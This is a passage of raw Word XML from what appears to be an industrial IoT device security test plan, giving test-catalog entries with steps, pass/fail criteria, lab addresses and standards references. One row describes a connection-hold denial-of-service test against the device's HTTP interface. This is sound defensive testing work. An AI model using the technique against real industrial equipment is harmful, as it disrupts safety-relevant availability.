      <w:tr w:rsidR="00900880" w:rsidRPr="00D0764E" w14:paraId="1447590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368C615" w14:textId="77777777" w:rsidR="00900880" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1047CC1E" w14:textId="77777777" w:rsidR="007E4FD1" w:rsidRPr="007E4FD1"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7E4FD1">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Connection-hold self-DoS: open and hold 2 HTTP connections; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1583FC4F" w14:textId="0BDF4ADE" w:rsidR="00900880" w:rsidRPr="007E4FD1"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7E4FD1">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>attempt a 3rd legitimate identification read</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03730CBD" w14:textId="4F5869EC" w:rsidR="00900880" w:rsidRPr="00507F15" w:rsidRDefault="007F2F9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F2F96">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Proves G-2 (the CR 7.1 mechanism is itself a CR 7.1 weakness)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33126574" w14:textId="58FF8CB6" w:rsidR="00507F15" w:rsidRPr="00802DB8"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02DB8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK for ICS T0814</w:t>
            </w:r>
            <w:r w:rsidR="000405C0" w:rsidRPr="00802DB8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1409074B" w14:textId="77777777" w:rsidR="00507F15" w:rsidRPr="00802DB8"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02DB8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">NIST SP 800-115 §5.2; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FBC5E50" w14:textId="50F64D87" w:rsidR="00900880" w:rsidRPr="00802DB8"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02DB8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ifm CM-009</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="287B10FC" w14:textId="7C6C426B" w:rsidR="00900880" w:rsidRPr="00802DB8" w:rsidRDefault="00B11FA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02DB8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00900880" w:rsidRPr="00035F89" w14:paraId="220FFCE7"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02E63D1" w14:textId="77777777" w:rsidR="00900880" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EB80458" w14:textId="0CE64BC3" w:rsidR="00900880" w:rsidRPr="00751C47" w:rsidRDefault="00BB499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B4996">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Redundancy check: with a COM/SysCom interruption present, confirm identification is unavailable while the safety function persists</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="548B7F61" w14:textId="4B2CE0D3" w:rsidR="00900880" w:rsidRPr="00751C47" w:rsidRDefault="00D3670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36700">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Proves G-3 (availability inversion)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21111E9F" w14:textId="77777777" w:rsidR="00802DB8" w:rsidRPr="00751C47"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751C47">
              <w:t xml:space="preserve">NIST SP 800-115 §3.2; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06A29D29" w14:textId="22F16089" w:rsidR="00900880" w:rsidRPr="00751C47"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751C47">
              <w:t>OWASP ISTG-DES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2773D71B" w14:textId="6425F62A" w:rsidR="00900880" w:rsidRPr="00751C47"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51C47">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="431426E2" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="772489C2" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FC5D9A0" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:commentRangeStart w:id="8"/>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Two-Level Test Catalog</w:t>
      </w:r>
      <w:commentRangeEnd w:id="8"/>
      <w:r w:rsidR="004D759F">
        <w:rPr>
          <w:rStyle w:val="Kommentarzeichen"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:commentReference w:id="8"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C679905" w14:textId="7376BE2D" w:rsidR="0069129D" w:rsidRDefault="0069129D" w:rsidP="00DC6D46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1522"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DB51FED" w14:textId="6EE1C197" w:rsidR="00DC6D46" w:rsidRPr="00E55DD7" w:rsidRDefault="00DC6D46" w:rsidP="00DC6D46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E55DD7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ007-01 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00E55DD7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Identification Availability &amp; Accessibility Baseline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72345BDD" w14:textId="77777777" w:rsidR="00DC6D46" w:rsidRPr="00DB074F" w:rsidRDefault="00DC6D46" w:rsidP="00DC6D46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1522"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B81E6B5"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615BEB1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7C57B8" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A3DD68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0B481B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E567001" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75139500" w14:textId="23242849" w:rsidR="00B73A1A" w:rsidRPr="00105368" w:rsidRDefault="00D36B2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36B22">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ007-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="001604A0" w14:paraId="2A011C1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8542377"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7EE172E1" w14:textId="7DD157BB" w:rsidR="00B73A1A" w:rsidRPr="00105368" w:rsidRDefault="002067E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2067E4">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
            <w:r w:rsidRPr="002067E4">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:tab/>
              <w:t>RQ-007 (EHSR identification, availability/accessibility) → CR 7.8 / CR 6.1 → Asset H, Asset D</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00EE7A74" w14:paraId="3D6027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9FB664" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1524BC80" w14:textId="7209592B" w:rsidR="00B73A1A" w:rsidRPr="00105368" w:rsidRDefault="0086332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commentRangeStart w:id="9"/>
            <w:r w:rsidRPr="00863322">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Loss of availability (baseline reference)</w:t>
            </w:r>
            <w:commentRangeEnd w:id="9"/>
            <w:r w:rsidRPr="00105368">
              <w:rPr>
                <w:rStyle w:val="Kommentarzeichen"/>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:commentReference w:id="9"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w14:paraId="27CBDFA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CD3ACE0" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F9BD1C9" w14:textId="59633AD4" w:rsidR="00B73A1A" w:rsidRPr="00105368" w:rsidRDefault="00A5161E"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SVV-1 (Requirement-based Testing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00EE7A74" w14:paraId="1B52981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34F6554" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27EF1DAF" w14:textId="41FAC8EB" w:rsidR="00B73A1A" w:rsidRPr="00105368" w:rsidRDefault="00596E6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96E69">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Confirm that, in normal OPERATE, the safety-relevant installed-software identification is retrievable and presented in an easily accessible form (browser Visualizer + human-readable version strings), establishing the availability baseline.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00EE7A74" w14:paraId="0D10EDE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AA0A7AE" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="706496C1" w14:textId="77777777" w:rsidR="004E2C9C" w:rsidRDefault="004E2C9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E2C9C">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">1. In OPERATE, open the IoT-Core Visualizer by device IP. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A422325" w14:textId="77777777" w:rsidR="004E2C9C" w:rsidRDefault="004E2C9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E2C9C">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Retrieve all safety-relevant SW identifiers. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="104DA072" w14:textId="5DF850D7" w:rsidR="00B73A1A" w:rsidRPr="00105368" w:rsidRDefault="004E2C9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E2C9C">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3. Confirm values are human-readable and the Visualizer renders without special tooling.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00EE7A74" w14:paraId="4E58E5A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83DBD5" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69C90701" w14:textId="77777777" w:rsidR="00BF6FA5" w:rsidRDefault="00BF6FA5"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BF6FA5">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">PASS if the Visualizer loads and all safety-relevant SW identifiers are shown in human-readable form (accessibility limb met). </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26957291" w14:textId="601EB05D" w:rsidR="00B73A1A" w:rsidRPr="00105368" w:rsidRDefault="00BF6FA5"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BF6FA5">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>FAIL if any identifier is unreadable or the Visualizer is inaccessible in OPERATE.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="436E8A90" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRPr="00AF57B2" w:rsidRDefault="00B73A1A" w:rsidP="00B73A1A">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02C682D1"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5DC1D74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49550DD" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F4BE5F6"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1EB05EE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6C6827" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09E48433" w14:textId="0F18F029" w:rsidR="00B73A1A" w:rsidRPr="00105368" w:rsidRDefault="002921E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921E3">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ007-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00EE7A74" w14:paraId="1AF172C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F34F371" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D6C331B" w14:textId="4D8FB578" w:rsidR="00B73A1A" w:rsidRPr="00105368" w:rsidRDefault="00121C6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21C61">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>DUT 192.168.0.2; browser 192.168.50.20; Pi mgmt eth1 = 192.168.50.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00BB230F" w14:paraId="5D09BB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DA35F" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B01543E" w14:textId="3042A6E2" w:rsidR="00B73A1A" w:rsidRPr="00105368" w:rsidRDefault="00D5128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51283">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Web browser (Visualizer), curl</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00EE7A74" w14:paraId="1C911120"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969C87A" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A3CE103" w14:textId="3F3EE4C5" w:rsidR="00B73A1A" w:rsidRPr="006868A2" w:rsidRDefault="00A41336"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868A2">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>http://192.168.0.2 (Visualizer) + curl -s http://192.168.0.2/deviceinfo/swinfo/scpuversion etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00EE7A74" w14:paraId="467C6F5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CCEF6D" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="270A055C" w14:textId="52968F2D" w:rsidR="00B73A1A" w:rsidRPr="00105368" w:rsidRDefault="007935E1"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Pr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Visualizer accessible/ SW identifiers human-readable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00EE7A74" w14:paraId="0EFC2B8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EC7488C" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E36FFB2" w14:textId="00B3FF25" w:rsidR="00B73A1A" w:rsidRPr="00105368" w:rsidRDefault="005074CF" w:rsidP="00655E93">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EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005074CF">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Visualizer screenshot, TC0701_ids.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3448CBC8" w14:textId="286A27B4" w:rsidR="007702A5" w:rsidRDefault="007702A5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="781999ED" w14:textId="77777777" w:rsidR="00105368" w:rsidRDefault="00105368" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08F6C9CB" w14:textId="69DDB8C6" w:rsidR="00105368" w:rsidRDefault="00105D20" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E55DD7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ007-02 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00E55DD7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Identification Availability Across Operating States</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D664CB3" w14:textId="77777777" w:rsidR="0069129D" w:rsidRDefault="0069129D" w:rsidP="0069129D">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9129D" w14:paraId="7CA10630"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9960D8" w14:textId="77777777" w:rsidR="0069129D" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F2514EF" w14:textId="77777777" w:rsidR="0069129D"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9129D" w14:paraId="27C85E5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7758E5" w14:textId="77777777" w:rsidR="0069129D" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
